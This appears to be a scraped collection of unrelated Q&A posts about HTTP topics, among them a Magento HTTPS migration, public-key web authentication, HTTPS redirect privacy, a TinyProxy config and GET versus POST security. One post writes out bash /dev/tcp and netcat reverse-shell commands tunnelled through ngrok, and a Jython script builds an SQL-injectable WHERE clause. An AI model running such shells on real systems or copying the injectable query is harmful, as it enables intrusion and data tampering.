M2 2.2.11 moving http to https, hostname error, url changes not reflected

I updated Magento to 2.2.11 for a new payment processor extension. The extension requires everything to go through HTTPS, so I enabled that for the domain (shared hosting). I compiled, deployed, reindexed, and cleaned the caches. However, the frontend continues to use HTTP, and the backend is only accessible (via HTTP) if I clear cookies before every session.

Guides instruct me to change values in store/system config/web so that both the secure and unsecure base URLs point to https. I am unable to change these, as entering the https URL and trying to save results in the following error:

The input appears to be a DNS hostname but cannot match TLD against
known list; The input does not appear to be a valid URI hostname; The
input does not appear to be a valid local network name

I’ve manually edited the base_url values in the db, but when I load store/config/web the changes are not reflected. I am at a loss as to where the admin backend is pulling the data from, since it’s ignoring the db values.
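
For reference, the rows in question are the standard web/unsecure/base_url and web/secure/base_url entries in core_config_data. A minimal sketch of that kind of edit (hypothetical credentials and domain, assuming the PyMySQL package) looks like this:

import pymysql  # assumes PyMySQL is available; any MySQL client works the same way

conn = pymysql.connect(host="localhost", user="magento", password="...",
                       database="magento", autocommit=True)
with conn.cursor() as cur:
    for path in ("web/unsecure/base_url", "web/secure/base_url"):
        cur.execute(
            "UPDATE core_config_data SET value = %s "
            "WHERE path = %s AND scope = 'default' AND scope_id = 0",
            ("https://www.example.com/", path),
        )
conn.close()

# Note: Magento serves configuration through its config cache, so values edited
# directly in the db will not show up in the admin (or the frontend) until the
# cache is flushed, e.g. `php bin/magento cache:flush`.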

db config: [screenshot]

store/config/web unsecure and secure URLs: [screenshot]

store/config/web cookie settings: [screenshot]

You can tell this isn’t my day job, but I’m managing the e-commerce site for my dad since his budget doesn’t allow for someone actually qualified. Any help would be most welcome.

web server – HTTP authentication with public/private key pair

I’m looking for a way to authenticate clients/users at a web server with public/private key pairs and have already read this question:
Public key authentication or similar over HTTP/HTTPS? The answers are similar to everything else I found on the web. In short: “If you want public key authentication via HTTPS, use SSL client certificates”.

However, I’m looking for a solution that is as simple and secure as SSH authentication with public/private keys. My problem with SSL client certificates is that you need a CA, and that makes a big difference from a security point of view, imho.

Here is why: if attackers steal your CA’s private key, they are able to authenticate as any user, because they can sign their own client certificates. In the case of SSH, if attackers steal a user’s private key, they can only authenticate as that single user.

So, in conclusion, I have to make sure that my CA is secure, and the best way is to have a dedicated system/computer serving as the CA. This means significantly higher effort and higher costs.


Considering security, I think it’s arguable which mechanism is better. But I think that if public key authentication is sufficient for SSH access, it should also be applicable to web application authentication. Also note that I only want to use public/private keys as an addition to my existing HTTP Basic (user/password) authentication in order to increase security. Actually, my goal is to add a second factor with minimal effort and without requiring users to use token generators.
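
To illustrate what I have in mind, here is a minimal sketch of SSH-style challenge-response as a second factor, using Ed25519 via the cryptography package (assumed available); the server stores only each user’s public key, so there is no CA to protect:

import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric import ed25519

# Enrollment: the user generates a key pair and registers the public half.
client_key = ed25519.Ed25519PrivateKey.generate()
registered_public_key = client_key.public_key()

# Login: the server issues a fresh random challenge, the client signs it.
challenge = os.urandom(32)
signature = client_key.sign(challenge)

# Server side: verify the signature with the stored public key only.
try:
    registered_public_key.verify(signature, challenge)
    print("second factor accepted")
except InvalidSignature:
    print("second factor rejected")

A server compromise then exposes only public keys, and a stolen private key affects only that one user, which is exactly the property I’m after.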

javascript – Is it possible to load data from the server using an HTTP POST request within a Magento Module js file?

Is it possible to load data from the server using an HTTP POST request within a Magento Module js file?

File located in
app/code/MyVendor/myCustomModule/view/frontend/web/js/mycustom.js

Example request:

    function test() {
        // POST to the endpoint and show the response; jQuery is assumed to be loaded.
        $.post("sample_data.php", function (data, status) {
            alert("Data: " + data + "\nStatus: " + status);
        });
    }

On the frontend I get a 403 error when sample_data.php is called.

bash – Unable to start reverse shell over HTTP

I am able to get a reverse shell working locally over TCP, but I am failing to trigger it remotely over HTTP.

Locally over TCP:

  • Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1;
  • Success!

Remotely over HTTP:

  • Attacker runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Attacker runs ngrok to generate a web-facing IP: ./ngrok http --subdomain=example 8000
  • Target runs an interactive bash shell: bash -i >& /dev/tcp/example.ngrok.io/80 0>&1; (using port 80 because it’s HTTP)
  • The connection fails; I don’t even see any incoming traffic showing up on ngrok.

I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe (from this post)

Can anyone spot what I’m doing wrong?

python – Create or update record via HTTP request

I have an external system that sends an HTTP request to a Jython script (in IBM’s Maximo Asset Management platform).

The Jython 2.7.0 script does this:

  1. Accepts an HTTP request: http://server:host/maximo/oslc/script/CREATEWO?_lid=wilson&_lpwd=wilson&f_wonum=LWO0382&f_description=LEGACY WO&f_classstructureid=1666&f_status=APPR&f_wopriority=1&f_assetnum=LA1234&f_worktype=CM
  2. Loops through parameters:
    • Searches for parameters that are prefixed with f_ (‘f’ is for field-value)
    • Puts the parameters in a list
    • Removes the prefix from the list values (so that the parameter names match the database field names).
  3. Updates or creates records via the parameters in the list:
    • If there is an existing record in the system with the same work order number, then the script updates the existing record with the parameter values from the list.
    • If there isn’t an existing record, then a new record is created (again, from the parameter values from the list).
  4. Finishes by returning a message to the external system (message: updated, created, or other (aka an error)).

Can the script be improved?


from psdi.server import MXServer
from psdi.mbo import MboSet

params = [param for param in request.getQueryParams() if param.startswith('f_')]
paramdict = {}
resp = ''
for p in params:
    paramdict[p[2:]] = request.getQueryParam(p)

woset = MXServer.getMXServer().getMboSet("workorder",request.getUserInfo())
whereClause = "wonum= '" + request.getQueryParam("f_wonum")+ "'"

woset.setWhere(whereClause)
woset.reset()
woMbo = woset.moveFirst()

if woMbo is not None:
    for k,v in paramdict.items():
        woMbo.setValue(k,v,2L)
    resp = 'Updated workorder ' + request.getQueryParam("f_wonum")
    woset.save()
    woset.clear()
    woset.close()
else:
    woMbo=woset.add()
    for k,v in paramdict.items():
        woMbo.setValue(k,v,2L)
    resp = 'Created workorder ' + request.getQueryParam("f_wonum")
    woset.save()
    woset.clear()
    woset.close()
responseBody = resp

Note 1: I’ve been told that the where clause in this script is vulnerable to SQL injection. I’m aware of this issue and have reached out to my organization’s technical/security experts for ideas about how to mitigate this risk.

Note 2: Unfortunately, I’m not able to import Python 2.7.0 libraries into my Jython implementation. In fact, I don’t even have access to all of the standard Python libraries.

Note 3: The acronym ‘MBO’ stands for ‘Maximo Business Object’ (it’s an IBM thing). For the purpose of this question, a Maximo Business Object can be thought of as a work order record. Additionally, the constant 2L tells the system to override any MBO rules/constraints.

encryption – Solution to User Initial HTTP Requests Unencrypted Despite HTTPS Redirection?

It is my understanding that requests from a client browser to a web server will initially follow the specified protocol, e.g. HTTPS, and default to HTTP if none is specified (tested in Firefox). On the server side it is desirable to enforce HTTPS for all connections, for the privacy of request headers, and as a result HTTPS redirections are used. The problem is that any initial request where the client does not explicitly request HTTPS will be sent unencrypted. For example, the client enters the URL below into the browser.

google.com/search?q=unencrypted-get

google.com will redirect the client browser to use HTTPS, but the initial HTTP request and GET parameters were already sent unencrypted, possibly compromising the privacy of the client. Obviously there is nothing foolproof the server can do to mitigate this vulnerability, but:

  1. Could this misuse compromise the subsequent TLS security, possibly through a known-plaintext attack (KPA)?
  2. Are there any less obvious measures that could mitigate this, possibly through some DNS-based solution?
  3. Would it be sensible for a future client standard to always attempt HTTPS first by default?
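
To make the leak concrete, here is a minimal sketch (hypothetical host and port) of an HTTP-to-HTTPS redirector: the full path and query string reach it, and any on-path observer, in cleartext before the client ever sees the redirect.

from http.server import BaseHTTPRequestHandler, HTTPServer

class RedirectToHttps(BaseHTTPRequestHandler):
    def do_GET(self):
        # self.path (including ?q=...) arrived unencrypted over plain HTTP.
        print("seen in cleartext:", self.path)
        self.send_response(301)
        self.send_header("Location", "https://www.example.com" + self.path)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 8080), RedirectToHttps).serve_forever()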

rest – Is it good practice to have an endpoint URL with parameters accepting different types of values according to an indicator in the HTTP header?

Assume a resource URL in the context of REST API:

/sites/<site id or site code>/buildings/<building id or building code>

The values of the two path parameters, <site id or site code> and <building id or building code>, can, as the names indicate, be either an id or a code. Implicitly this means:

For instance, if there is a building with 1 as the building id and rake as the building code, located in a site with 5 as the site id and SF as the site code, then the following endpoint URLs should all retrieve the same result:

  • /sites/5/buildings/1
  • /sites/5/buildings/rake
  • /sites/SF/buildings/1
  • /sites/SF/buildings/rake

In order to reduce the ambiguity, there is a hint in the HTTP headers, e.g. path-parameter-type with a value of CODE or ID, indicating whether the given path parameter values are codes or IDs.

Even so, the implementation of such a resource endpoint contains lots of if conditions due to the ambiguity. However, from the end user’s perspective, this seems handy.

My question is whether such an endpoint design is good practice or a typical bad practice, despite the fact that there is a type indicator in the HTTP header.
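
For concreteness, here is a sketch of the branching such a design implies (Flask-style; the in-memory SITES data is hypothetical):

from flask import Flask, abort, jsonify, request

app = Flask(__name__)

# Hypothetical data: site id -> site record with a code and buildings keyed by id.
SITES = {
    "5": {"code": "SF",
          "buildings": {"1": {"code": "rake", "name": "Rake building"}}},
}

def _by_code(mapping, code):
    # Linear scan for the record whose 'code' matches.
    return next((v for v in mapping.values() if v["code"] == code), None)

@app.route("/sites/<site>/buildings/<building>")
def get_building(site, building):
    kind = request.headers.get("path-parameter-type", "ID").upper()
    if kind == "ID":
        s = SITES.get(site)
    elif kind == "CODE":
        s = _by_code(SITES, site)
    else:
        abort(400)  # unknown indicator value
    if s is None:
        abort(404)
    b = s["buildings"].get(building) if kind == "ID" else _by_code(s["buildings"], building)
    if b is None:
        abort(404)
    return jsonify(b)

Supporting the mixed combinations from the list above (site by id, building by code) would need yet more branches, which is the cost being weighed against the convenience.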

web browser – Does ‘Google Safe Browsing’ make an HTTP request for every opened URL?

I know about the Google Safe Browsing DB, used by both Firefox and Chrome to prevent opening malicious websites by displaying the well-known red warning screen:

[screenshot of the red warning page]

But isn’t this a privacy issue? Does GSB make an HTTP API call for each opened URL, or does it use a locally cached DB?
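
For reference, a per-URL check against the Safe Browsing Lookup API would look roughly like the sketch below (API key and client fields are placeholders). As far as I know, browsers do not do this for every URL: they use the Update API, matching URL hash prefixes against a locally cached list and only contacting Google when a prefix matches.

import requests  # assumes the requests package is available

API_KEY = "YOUR_API_KEY"  # placeholder

def lookup(url):
    body = {
        "client": {"clientId": "example-client", "clientVersion": "1.0"},
        "threatInfo": {
            "threatTypes": ["MALWARE", "SOCIAL_ENGINEERING"],
            "platformTypes": ["ANY_PLATFORM"],
            "threatEntryTypes": ["URL"],
            "threatEntries": [{"url": url}],
        },
    }
    resp = requests.post(
        "https://safebrowsing.googleapis.com/v4/threatMatches:find",
        params={"key": API_KEY}, json=body, timeout=10)
    resp.raise_for_status()
    return resp.json().get("matches", [])  # empty list means no known threat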

jenkins – TinyProxy Forward from HTTP to HTTPS

So, I have a server that is sitting behind HTTPS.

The tech stack I use is:

Jenkins > BranchSourcePlugin > TinyProxy > https://bitbucketExample.com

I want to use TinyProxy to forward all traffic to Bitbucket.
Here is my TinyProxy configuration:

User tinyproxy
Group tinyproxy

Port 8888
Timeout 600
DefaultErrorFile "/usr/share/tinyproxy/default.html"
StatFile "/usr/share/tinyproxy/stats.html"
LogFile "/var/log/tinyproxy/tinyproxy.log"
LogLevel Info
PidFile "/var/run/tinyproxy/tinyproxy.pid"
MaxClients 100
MinSpareServers 5
MaxSpareServers 20
StartServers 10
MaxRequestsPerChild 0
ViaProxyName "tinyproxy"
ConnectPort 443
ConnectPort 563
ConnectPort 8888

Any tips would be welcome.

parameter – vulnerability of http GET

TL;DR: HTTPS provides encryption, and it’s the only thing protecting the parameters.

It’s well known that GET requests with ?xx=yy arguments embedded can be altered in transit, and therefore are insecure.

If you are not using encryption, everything is insecure: HTTP, Telnet, FTP, TFTP, IRC, SNMP, SMTP, IMAP, POP3, DNS, Gopher…

If I change the request to POST…

…it does not change anything at all.

and use HTTPS…

HTTPS changes everything.

Any HTTP request not protected by TLS is not protected. It doesn’t matter whether you use GET, POST, or PUT, or whether it’s a custom header: none of that changes a thing.

For example, this is a GET request:

GET /test?field1=value1&field2=value2 HTTP/1.1
Host: foo.example
Accept: text/html

And this is a POST request:

POST /test HTTP/1.1
Host: foo.example
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

field1=value1&field2=value2

What is the difference? On the GET request, the parameters are on the first line, and on the POST, the parameters are on the last line. Just that. The technical reasons behind GET or POST are not the point here.

Suppose GET style parameters were added to a POST request – would those parameters be reliably ignored?

It depends entirely on the application. In PHP, for example, if the application expects $username = $_POST['username'], sending the value as a GET parameter changes nothing at all, as the application will only read the POST parameter.
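
The same point in a Python sketch (Flask-style, hypothetical route): the handler reads the value from the POST body, so a query-string parameter tacked onto the URL is simply never consulted.

from flask import Flask, request

app = Flask(__name__)

@app.route("/login", methods=["POST"])
def login():
    username = request.form.get("username")  # POST body, like $_POST
    ignored = request.args.get("username")   # query string, like $_GET
    return f"authenticating {username!r} (query-string value {ignored!r} unused)"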

What about some sort of security downgrade attack? If the URL manipulator forces HTTPS transactions to fail, and the client/server then “helpfully” downgrade to HTTP, that would allow the unencrypted POST body to be manipulated.

Not easy against properly configured servers. If they use the HTTP Strict-Transport-Security header, it forces the client to access the site only over HTTPS, even if the user explicitly asks for HTTP on port 80. The browser will helpfully upgrade to HTTPS, not the other way around.

Even on servers that do not use HSTS headers, if the first access is made via HTTPS, it’s not trivial to downgrade to HTTP. The attacker must present a forged certificate, and the client must accept it, for an HTTPS connection to be redirected to HTTP. But if the attacker succeeds at this, they will usually keep using HTTPS, since the client has already accepted the fake certificate anyway.